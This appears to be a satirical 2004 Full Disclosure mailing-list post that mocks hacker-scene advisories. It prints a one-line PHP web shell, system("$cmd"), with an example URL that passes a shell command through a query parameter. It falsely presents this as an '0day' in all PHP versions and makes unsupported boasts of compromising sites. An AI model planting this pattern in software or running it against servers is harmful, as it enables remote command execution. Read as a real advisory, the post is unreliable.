Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

ANOTHER 3L33T3 ADVISO AND NOT ON PHP-CASTOR 10.3 BETA (used by 3 peoples on internet) !!! 0DAY EXPLOIT !
From: frogman () no-log org
Date: Mon, 5 Jul 2004 21:20:24 +0200 (CEST)

This is IHCTEAM material. We fuck blackhats and we own the planet. This is
a leet advisory, s0 l33t. Just read it and be quiet.

---------------------------

IHC TEAM private work, all the fame become to IHC TEAM and the leetest mr.
Frog-m () n !!!!

Product: PHP
Version: all
Security level: Very high baby !!!


What's the problem ?
==================

There is a BIG 1337 BUG 0day in all the php versions for ever never. This
bug is caused by
the system() function. This is a very VERY 3v1l backdoor, that allows
execution of
arbitrary shell command. This backdoor has been coded by ZyXyS from HACK3R
c0rp0r4ti0n (c) (TM) (R).

Because we want fame, we'll explain you da bug:
l00k at th1s 3v1l code:

<?
system("$cmd");
?>

*TADAAAA* !


If this code is on a webserver, a malicious user (like ZyXyS) can exec
EVERYTHING and own EVERYWHERE.
Example:
www.thc-is-lame.org/page.php?cmd=ls%20/tmp

It will give you:

tmp-shells-owned-with-THC-Hydra-fucking-lame-kiddy-tool.txt
adore.tar.gz
last-10-leaked-exploits.tar.gz


You see, you can rock.
So, at this point we can see that ZyXyS is a very leet guy: THIS BACKDOOR
is less detectable than
a LKM BACKDOOR like adore.tar.gz (<--- hahaha).

I release this vulnerability because the K-otik team (www.k-otik.com)
owned ZyXyS 10 days ago
(after the fbi) and discovered the backdoor, and k-otik wanted to write an
advisory, ONLY FOR FAME
AND MONEY. I want this fame (but for the money, I don't mind, I am rich
because I sell 0day,
traded on #darknet, to idefense), so I had to release the bug before K-otik.
k-otik is like hack.co.za, they release everything and nothing, but they
can't code their own exploit.


Greets:
======

Rudolf Polzer (divzero () gmail com): Thank to his idea to disclose this bug
and if you have another idea
for us mail me
packetstormsecurity: they give us kiddie-friendly exploits and mass rooters
spender: he sells good security patches
isec: now my grandmother can r00t linux boxes
bugtraq: they leak bugs found by ugly blackhats, which worked a lot of
time to discover them
espionet guys: they represented very well the hacker scene in a TV show
with their netbus
(please don't open my cdrom device guys)


Fame:
====


We already owned everyone and everything with these exploits years ago,
and in
fact we've all had them sitting on the shelf gathering dust due to lack of
new targets.

FUN TESTED IDEAS:

www.team-teso.net (down because of us)
www.thc.org (haha owned 10 times)
www.securityfocus.com


It was very funny to read .gov and .mil files.

WARNING !!!

/!\ WE ARE LOOKING FOR A JOB IN THE SECURITY RESEARCH /!\

Visit us:

www.ihcteam.com
www.newffr.com
www.espionet.net
www.underground-fr.org
www.phpsecure.com


---------------------------

We n33d f4me, m0n3y, g1rls and m0nk3ys, so VIVA EL DISCLOSURO.

---- fr0g-m () n ----





_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]